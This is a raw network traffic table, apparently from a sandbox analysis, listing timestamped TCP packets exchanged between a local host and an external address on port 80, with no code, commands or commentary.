Dec 20, 2024 16:33:10.779675961 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.779725075 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.780700922 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.780751944 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.780834913 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.781142950 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.781784058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.781837940 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.781917095 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.781974077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.782838106 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.782886028 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.782929897 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.782973051 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.784027100 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.784080029 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.784213066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.784269094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.785095930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.785159111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.785339117 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.785545111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.786185026 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.786294937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.786319971 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.786375046 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.787271023 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.787328005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.787596941 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.787640095 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.788314104 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.788362980 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.788485050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.788535118 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.789511919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.789581060 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.789786100 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.789835930 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.790494919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.790554047 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.790632963 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.790684938 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.791578054 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.791629076 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.791692972 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.791878939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.792800903 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.792848110 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.792927027 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.793121099 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.793880939 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.793935061 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.794015884 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.794164896 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.794910908 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.794962883 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.795480013 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.795659065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.796035051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.796071053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.796118975 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.797086000 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.797139883 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.797774076 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.797823906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.798259020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.798284054 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.798321009 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.798321009 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.799690008 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.799704075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.799732924 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.799742937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.800451994 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.800496101 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.801019907 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.801064968 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.801450014 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.801593065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.801636934 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.802539110 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.802622080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.802670956 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.939295053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.939367056 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.939444065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.939572096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.939832926 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.939846039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.939889908 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.940960884 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.940974951 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.941023111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.942034006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.942085981 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.942471981 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.942692995 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.943140030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.943152905 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.943192005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.944400072 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.944452047 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.944536924 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.944806099 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.945347071 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.945486069 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.945563078 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.945837021 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.946472883 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.946512938 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.946552038 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.946594000 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.947468996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.947644949 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.947711945 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.947751999 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.948543072 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.948596001 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.949395895 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.949609995 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.949666023 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.949712992 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.949872017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.949913025 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.950819016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.950867891 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.951108932 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.951210976 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.951891899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.952069998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.952094078 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.952135086 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.952955961 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.953125954 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.953380108 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.953704119 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.954181910 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.954284906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.954467058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.954571009 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.955178022 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.955219030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.955384016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.955429077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.956294060 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.956340075 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.956422091 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.956466913 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.957307100 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.957417965 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.957418919 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.957458019 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.958713055 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.958779097 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.958811045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.958811045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.959548950 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.959606886 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.959657907 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.959749937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.960639000 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.960715055 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.960750103 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.960793018 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.961767912 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.961826086 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.962023020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.962078094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.962809086 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.962826014 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.962866068 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.963891029 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.963952065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.965046883 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.965066910 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.965090036 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.965107918 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.965151072 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.965193987 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.966075897 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.966124058 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.966298103 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.966339111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.967187881 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.967236996 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.967328072 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.967452049 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.968291998 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.968341112 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.968858004 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.968976974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.969336033 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.969410896 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.969450951 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.970474958 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.970560074 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.970640898 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.970681906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.971682072 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.971740961 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.972027063 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.972132921 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.972765923 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.972867966 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.972948074 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.973138094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.973732948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.973799944 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.973850012 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.973948956 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.974828959 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.974867105 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.974910975 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.974953890 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.975941896 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.975991011 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.976063967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.976110935 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.977113008 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.977154016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.977319956 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.977364063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.978157043 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.978204966 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.978324890 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.978374958 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.979419947 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.979491949 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.979537964 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.980343103 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.980396032 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.980564117 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.980664015 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.981803894 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.981928110 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.982014894 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.982211113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.982639074 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.982775927 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.982805014 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.982815027 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.983597040 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.983727932 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.983767986 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.984704018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.984757900 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.984780073 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.984823942 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.985809088 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.986020088 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.986054897 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.986054897 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.986932039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.987025023 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.987185001 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.987234116 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.988064051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.988112926 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.988154888 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.988270044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.989192009 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.989249945 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.989289045 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.989334106 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.990221024 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.990268946 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.990401983 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.990495920 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.991302013 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.991353989 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.992207050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.992249966 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.992666006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.992681026 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.992710114 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.992721081 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.993782997 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.993887901 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.993961096 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.994008064 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.994559050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.994606018 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.994853020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.994960070 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.995764017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.995780945 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.995812893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.995826006 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.996834993 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.996885061 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.131618023 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.131696939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.131824017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.131875038 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.132111073 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.132250071 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.132253885 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.132291079 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.133255005 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.133317947 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.133618116 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.133657932 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.133747101 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.133791924 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.134712934 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.134783030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.134869099 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.134929895 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.135828972 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.135968924 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.135977030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.136003971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.136920929 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.137061119 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.137226105 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.137482882 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.138031960 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.138258934 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.138272047 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.138313055 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.139120102 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.139318943 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.139364958 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.140172005 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.140377998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.140575886 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.140635014 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.141319036 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.141391993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.141892910 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.141977072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.142355919 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.142807961 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.142821074 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.142847061 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.143481016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.143534899 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.143611908 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.143655062 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.144625902 CET	80	49881	185.156.73.23	192.168.2.6
